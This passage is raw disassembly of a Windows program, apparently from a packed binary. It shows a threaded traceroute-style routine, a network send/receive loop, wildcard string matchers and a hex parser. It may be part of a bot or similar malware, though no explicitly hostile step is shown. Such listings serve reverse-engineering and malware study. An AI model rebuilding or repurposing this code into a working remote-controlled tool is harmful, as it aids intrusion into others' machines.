call dword_417058 ; GetProcAddress
mov dword_41E304, eax
mov byte_41E310, 1
loc_409E6D: ; CODE XREF: sub_409DD0+32�j
cmp dword_41E2FC, 0
jnz short loc_409E7D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E7D: ; CODE XREF: sub_409DD0+A4�j
cmp dword_41E308, 0
jnz short loc_409E8D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E8D: ; CODE XREF: sub_409DD0+B4�j
cmp dword_41E304, 0
jnz short loc_409E9D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E9D: ; CODE XREF: sub_409DD0+C4�j
lea eax, [ebp+var_10D]
mov [ebp+var_2B8], eax
push [ebp+var_2B8]
call dword_417244 ; inet_addr
mov [ebp+var_2BC], eax
cmp [ebp+var_2BC], 0FFFFFFFFh
jnz short loc_409F18
push [ebp+var_2B8]
call dword_41723C ; gethostbyname
mov [ebp+var_2C0], eax
cmp [ebp+var_2C0], 0
jz short loc_409F06
mov eax, [ebp+var_2C0]
movsx eax, word ptr [eax+0Ah]
push eax
mov eax, [ebp+var_2C0]
mov eax, [eax+0Ch]
push dword ptr [eax]
lea eax, [ebp+var_2BC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_409F18
; ---------------------------------------------------------------------------
loc_409F06: ; CODE XREF: sub_409DD0+10D�j
push offset aCouldNotResolv ; "Could not resolve name"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409F18: ; CODE XREF: sub_409DD0+F2�j
; sub_409DD0+134�j
and [ebp+var_4], 0
mov byte ptr [ebp+var_2B4], 1
jmp short loc_409F33
; ---------------------------------------------------------------------------
loc_409F25: ; CODE XREF: sub_409DD0:loc_40A19C�j
mov al, byte ptr [ebp+var_2B4]
add al, 1
mov byte ptr [ebp+var_2B4], al
loc_409F33: ; CODE XREF: sub_409DD0+153�j
movzx eax, byte ptr [ebp+var_2B4]
movzx ecx, [ebp+var_D]
cmp eax, ecx
jg loc_40A1A1
cmp [ebp+var_4], 0
jnz loc_40A1A1
and [ebp+var_2EC], 0
or [ebp+var_2E4], 0FFFFFFFFh
and [ebp+var_2E0], 0
and [ebp+var_2DC], 0
and [ebp+var_2D0], 0
and [ebp+var_2C8], 0
and [ebp+var_2CC], 0
and [ebp+var_2D8], 0
and [ebp+var_2D4], 0
jmp short loc_409F9E
; ---------------------------------------------------------------------------
loc_409F91: ; CODE XREF: sub_409DD0:loc_40A04E�j
mov eax, [ebp+var_2D4]
inc eax
mov [ebp+var_2D4], eax
loc_409F9E: ; CODE XREF: sub_409DD0+1BF�j
mov eax, [ebp+var_2D4]
cmp eax, [ebp+var_8]
jnb loc_40A053
cmp [ebp+var_2D8], 0
jnz loc_40A053
push 20h
push [ebp+var_C]
push [ebp+var_2B4]
lea eax, [ebp+var_2CC]
push eax
push [ebp+var_2BC]
call sub_409CB1
add esp, 14h
test eax, eax
jz short loc_40A047
cmp [ebp+var_2CC], 0
jnz short loc_40A02F
mov eax, [ebp+var_2D0]
add eax, [ebp+var_2C4]
mov [ebp+var_2D0], eax
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_2E4]
jnb short loc_40A013
mov eax, [ebp+var_2C4]
mov [ebp+var_2E4], eax
loc_40A013: ; CODE XREF: sub_409DD0+235�j
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_2DC]
jbe short loc_40A02D
mov eax, [ebp+var_2C4]
mov [ebp+var_2DC], eax
loc_40A02D: ; CODE XREF: sub_409DD0+24F�j
jmp short loc_40A045
; ---------------------------------------------------------------------------
loc_40A02F: ; CODE XREF: sub_409DD0+215�j
mov eax, [ebp+var_2CC]
mov [ebp+var_2EC], eax
mov [ebp+var_2D8], 1
loc_40A045: ; CODE XREF: sub_409DD0:loc_40A02D�j
jmp short loc_40A04E
; ---------------------------------------------------------------------------
loc_40A047: ; CODE XREF: sub_409DD0+20C�j
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_40A04E: ; CODE XREF: sub_409DD0:loc_40A045�j
jmp loc_409F91
; ---------------------------------------------------------------------------
loc_40A053: ; CODE XREF: sub_409DD0+1D7�j
; sub_409DD0+1E4�j
mov eax, [ebp+var_2C8]
mov [ebp+var_2E8], eax
cmp [ebp+var_2EC], 0
jnz short loc_40A07B
mov eax, [ebp+var_2D0]
xor edx, edx
div [ebp+var_8]
mov [ebp+var_2E0], eax
jmp short loc_40A090
; ---------------------------------------------------------------------------
loc_40A07B: ; CODE XREF: sub_409DD0+296�j
and [ebp+var_2E4], 0
and [ebp+var_2E0], 0
and [ebp+var_2DC], 0
loc_40A090: ; CODE XREF: sub_409DD0+2A9�j
cmp [ebp+var_2EC], 0
jnz loc_40A165
push 2
push 4
lea eax, [ebp+var_2E8]
push eax
call dword_417220 ; gethostbyaddr
mov [ebp+var_2F0], eax
cmp [ebp+var_2F0], 0
jz short loc_40A115
movzx eax, byte ptr [ebp+var_2E8+3]
push eax
movzx eax, byte ptr [ebp+var_2E8+2]
push eax
movzx eax, byte ptr [ebp+var_2E8+1]
push eax
movzx eax, byte ptr [ebp+var_2E8]
push eax
mov eax, [ebp+var_2F0]
push dword ptr [eax]
push [ebp+var_2DC]
push [ebp+var_2E0]
push [ebp+var_2E4]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419594
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 2Ch
jmp short loc_40A163
; ---------------------------------------------------------------------------
loc_40A115: ; CODE XREF: sub_409DD0+2EB�j
movzx eax, byte ptr [ebp+var_2E8+3]
push eax
movzx eax, byte ptr [ebp+var_2E8+2]
push eax
movzx eax, byte ptr [ebp+var_2E8+1]
push eax
movzx eax, byte ptr [ebp+var_2E8]
push eax
push [ebp+var_2DC]
push [ebp+var_2E0]
push [ebp+var_2E4]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419568
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 28h
loc_40A163: ; CODE XREF: sub_409DD0+343�j
jmp short loc_40A187
; ---------------------------------------------------------------------------
loc_40A165: ; CODE XREF: sub_409DD0+2C7�j
push [ebp+var_2EC]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419540
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 10h
loc_40A187: ; CODE XREF: sub_409DD0:loc_40A163�j
mov eax, [ebp+var_2BC]
cmp eax, [ebp+var_2E8]
jnz short loc_40A19C
mov [ebp+var_4], 1
loc_40A19C: ; CODE XREF: sub_409DD0+3C3�j
jmp loc_409F25
; ---------------------------------------------------------------------------
loc_40A1A1: ; CODE XREF: sub_409DD0+170�j
; sub_409DD0+17A�j
xor eax, eax
locret_40A1A3: ; CODE XREF: sub_409DD0+4F�j
; sub_409DD0+A8�j ...
leave
retn 4
sub_409DD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A1A7 proc near ; CODE XREF: sub_40A9CF+FAE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
cmp [ebp+arg_4], 0
jnz short loc_40A1C7
push offset unk_419618
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1C7: ; CODE XREF: sub_40A1A7+A�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A1E0
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1E0: ; CODE XREF: sub_40A1A7+32�j
push 1A3h
push [ebp+arg_0]
push [ebp+var_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A3h
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
cmp eax, 0FFh
jg short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_40A231
; ---------------------------------------------------------------------------
loc_40A22A: ; CODE XREF: sub_40A1A7+63�j
; sub_40A1A7+73�j
mov [ebp+var_10], 1Eh
loc_40A231: ; CODE XREF: sub_40A1A7+81�j
mov eax, [ebp+var_4]
mov cl, byte ptr [ebp+var_10]
mov [eax+2A3h], cl
cmp [ebp+arg_C], 0
jz short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
cmp eax, 927C0h
jg short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
jmp short loc_40A268
; ---------------------------------------------------------------------------
loc_40A261: ; CODE XREF: sub_40A1A7+9A�j
; sub_40A1A7+AA�j
mov [ebp+var_14], 7530h
loc_40A268: ; CODE XREF: sub_40A1A7+B8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_14]
mov [eax+2A4h], ecx
cmp [ebp+arg_10], 0
jz short loc_40A288
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_18], eax
jmp short loc_40A28F
; ---------------------------------------------------------------------------
loc_40A288: ; CODE XREF: sub_40A1A7+D1�j
mov [ebp+var_18], 3
loc_40A28F: ; CODE XREF: sub_40A1A7+DF�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_18]
mov [eax+2A8h], ecx
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_4]
push offset sub_409DD0
push 0
push 0
call dword_4170B4 ; CreateThread
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A2C7
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
jmp short locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A2C7: ; CODE XREF: sub_40A1A7+113�j
push [ebp+var_8]
call dword_4170A4 ; CloseHandle
locret_40A2D0: ; CODE XREF: sub_40A1A7+1B�j
; sub_40A1A7+34�j ...
leave
retn
sub_40A1A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A2D2 proc near ; CODE XREF: sub_40A4A4+30�p
var_111C = dword ptr -111Ch
var_1118 = dword ptr -1118h
var_1114 = byte ptr -1114h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 111Ch
call sub_416BC0
mov eax, [ebp+arg_0]
add eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 104h
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
push offset dword_41966C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
add esp, 14h
push 2710h
push 0
push offset dword_419668
mov eax, [ebp+arg_0]
add eax, 104h
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A339
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A339: ; CODE XREF: sub_40A2D2+5E�j
mov eax, [ebp+arg_0]
add eax, 4
push eax
push offset dword_419660
lea eax, [ebp+var_114]
push eax
call dword_4171E0 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_114]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_8]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A38F
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A38F: ; CODE XREF: sub_40A2D2+AB�j
push 1000h
lea eax, [ebp+var_1114]
push eax
push [ebp+var_8]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_40A3B5
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_40A3C5
loc_40A3B5: ; CODE XREF: sub_40A2D2+DB�j
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A3C5: ; CODE XREF: sub_40A2D2+E1�j
lea eax, [ebp+var_1114]
mov [ebp+var_10], eax
loc_40A3CE: ; CODE XREF: sub_40A2D2:loc_40A492�j
mov eax, [ebp+var_10]
mov [ebp+var_111C], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A3E9
jmp loc_40A497
; ---------------------------------------------------------------------------
loc_40A3E9: ; CODE XREF: sub_40A2D2+110�j
push [ebp+var_111C]
call sub_407B5E
pop ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40A41B
push offset dword_418F4C
push [ebp+var_111C]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40A442
loc_40A41B: ; CODE XREF: sub_40A2D2+131�j
mov eax, [ebp+var_111C]
lea ecx, [ebp+var_1114]
cmp eax, ecx
jz short loc_40A440
push offset dword_41965C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A440: ; CODE XREF: sub_40A2D2+157�j
jmp short loc_40A458
; ---------------------------------------------------------------------------
loc_40A442: ; CODE XREF: sub_40A2D2+147�j
push [ebp+var_111C]
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A458: ; CODE XREF: sub_40A2D2:loc_40A440�j
push 3E8h
call dword_41709C ; Sleep
push offset dword_41E2D8
call sub_409C6C
pop ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax+4]
mov [ebp+var_1118], eax
push offset dword_41E2D8
call sub_409C7A
pop ecx
cmp [ebp+var_1118], 0
jz short loc_40A492
jmp short loc_40A497
; ---------------------------------------------------------------------------
loc_40A492: ; CODE XREF: sub_40A2D2+1BC�j
jmp loc_40A3CE
; ---------------------------------------------------------------------------
loc_40A497: ; CODE XREF: sub_40A2D2+112�j
; sub_40A2D2+1BE�j
push [ebp+var_8]
call sub_40538D
pop ecx
mov al, 1
locret_40A4A2: ; CODE XREF: sub_40A2D2+62�j
; sub_40A2D2+B8�j ...
leave
retn
sub_40A2D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A4A4 proc near ; DATA XREF: sub_40A50E+A1�o
var_3A8 = dword ptr -3A8h
var_2A4 = byte ptr -2A4h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3A8h
push 3A7h
push [ebp+arg_0]
lea eax, [ebp+var_3A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_3A8]
push eax
call sub_40A2D2
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40A4FC
lea eax, [ebp+var_2A4]
push eax
push offset dword_419698
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40A4FC: ; CODE XREF: sub_40A4A4+3B�j
push [ebp+var_3A8]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40A4A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A50E proc near ; CODE XREF: sub_40A9CF+FE3�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_40A51D
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A51D: ; CODE XREF: sub_40A50E+8�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A536
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A536: ; CODE XREF: sub_40A50E+21�j
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A562
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40A586
; ---------------------------------------------------------------------------
loc_40A562: ; CODE XREF: sub_40A50E+3D�j
push offset dword_4196D4
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_4105FB
pop ecx
loc_40A586: ; CODE XREF: sub_40A50E+52�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4196B4
push 0
push [ebp+var_4]
push offset sub_40A4A4
call sub_4095A4
add esp, 18h
locret_40A5BC: ; CODE XREF: sub_40A50E+A�j
; sub_40A50E+23�j
leave
retn
sub_40A50E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5BE proc near ; CODE XREF: sub_40A5BE+32�p
; sub_40A5BE+70�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A603
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A5DD
mov al, 1
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5DD: ; CODE XREF: sub_40A5BE+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A5FC
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5FC: ; CODE XREF: sub_40A5BE+28�j
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A603: ; CODE XREF: sub_40A5BE+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A614
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A614: ; CODE XREF: sub_40A5BE+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A63A
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A63A: ; CODE XREF: sub_40A5BE+64�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A65B
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A65B: ; CODE XREF: sub_40A5BE+85�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69E
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A67C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A687
loc_40A67C: ; CODE XREF: sub_40A5BE+B1�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69A
loc_40A687: ; CODE XREF: sub_40A5BE+BC�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69A: ; CODE XREF: sub_40A5BE+C7�j
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69E: ; CODE XREF: sub_40A5BE+A6�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A6E7
and [ebp+var_4], 0
jmp short loc_40A6B6
; ---------------------------------------------------------------------------
loc_40A6AF: ; CODE XREF: sub_40A5BE:loc_40A6E5�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A6B6: ; CODE XREF: sub_40A5BE+EF�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A6D4
mov al, 1
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6D4: ; CODE XREF: sub_40A5BE+110�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A6E5
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6E5: ; CODE XREF: sub_40A5BE+121�j
jmp short loc_40A6AF
; ---------------------------------------------------------------------------
loc_40A6E7: ; CODE XREF: sub_40A5BE+E9�j
xor al, al
locret_40A6E9: ; CODE XREF: sub_40A5BE+1A�j
; sub_40A5BE+39�j ...
leave
retn
sub_40A5BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A6EB proc near ; CODE XREF: sub_4097A7+10A�p
; sub_4098F3+155�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A730
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A70A
mov al, 1
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A70A: ; CODE XREF: sub_40A6EB+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A729
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A729: ; CODE XREF: sub_40A6EB+28�j
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A730: ; CODE XREF: sub_40A6EB+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A741
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A741: ; CODE XREF: sub_40A6EB+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A767
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A767: ; CODE XREF: sub_40A6EB+64�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 41h
jl short loc_40A77D
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 5Ah
jle short loc_40A793
loc_40A77D: ; CODE XREF: sub_40A6EB+85�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 61h
jl short loc_40A7BC
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 7Ah
jg short loc_40A7BC
loc_40A793: ; CODE XREF: sub_40A6EB+90�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
xor eax, 20h
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A7BC
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7BC: ; CODE XREF: sub_40A6EB+9B�j
; sub_40A6EB+A6�j ...
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A7DD
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7DD: ; CODE XREF: sub_40A6EB+DA�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A820
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A7FE
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A809
loc_40A7FE: ; CODE XREF: sub_40A6EB+106�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A81C
loc_40A809: ; CODE XREF: sub_40A6EB+111�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A81C: ; CODE XREF: sub_40A6EB+11C�j
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A820: ; CODE XREF: sub_40A6EB+FB�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A869
and [ebp+var_4], 0
jmp short loc_40A838
; ---------------------------------------------------------------------------
loc_40A831: ; CODE XREF: sub_40A6EB:loc_40A867�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A838: ; CODE XREF: sub_40A6EB+144�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A856
mov al, 1
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A856: ; CODE XREF: sub_40A6EB+165�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A867
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A867: ; CODE XREF: sub_40A6EB+176�j
jmp short loc_40A831
; ---------------------------------------------------------------------------
loc_40A869: ; CODE XREF: sub_40A6EB+13E�j
xor al, al
locret_40A86B: ; CODE XREF: sub_40A6EB+1A�j
; sub_40A6EB+39�j ...
leave
retn
sub_40A6EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A86D proc near ; CODE XREF: sub_40A8AD+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_4], 1
cmp [ebp+arg_4], 0
jnz short loc_40A884
push 1
pop eax
jmp short locret_40A8AB
; ---------------------------------------------------------------------------
loc_40A884: ; CODE XREF: sub_40A86D+10�j
mov [ebp+var_8], 1
jmp short loc_40A894
; ---------------------------------------------------------------------------
loc_40A88D: ; CODE XREF: sub_40A86D+39�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40A894: ; CODE XREF: sub_40A86D+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
loc_40A89A: ; DATA XREF: .packed:0041AE78�o
; .packed:0041AEBC�o ...
jg short loc_40A8A8
mov eax, [ebp+var_4]
imul eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_40A88D
; ---------------------------------------------------------------------------
loc_40A8A8: ; CODE XREF: sub_40A86D:loc_40A89A�j
mov eax, [ebp+var_4]
locret_40A8AB: ; CODE XREF: sub_40A86D+15�j
leave
retn
sub_40A86D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A8AD proc near ; CODE XREF: sub_406509+26�p
; sub_40A9CF+193F�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push esi
push edi
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_20], 0
mov esi, offset aAbcdef ; "abcdef"
lea edi, [ebp+var_1C]
movsd
movsw
movsb
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 30h
jnz short loc_40A90C
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 78h
jz short loc_40A905
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 58h
jnz short loc_40A90C
loc_40A905: ; CODE XREF: sub_40A8AD+48�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_40A90C: ; CODE XREF: sub_40A8AD+33�j
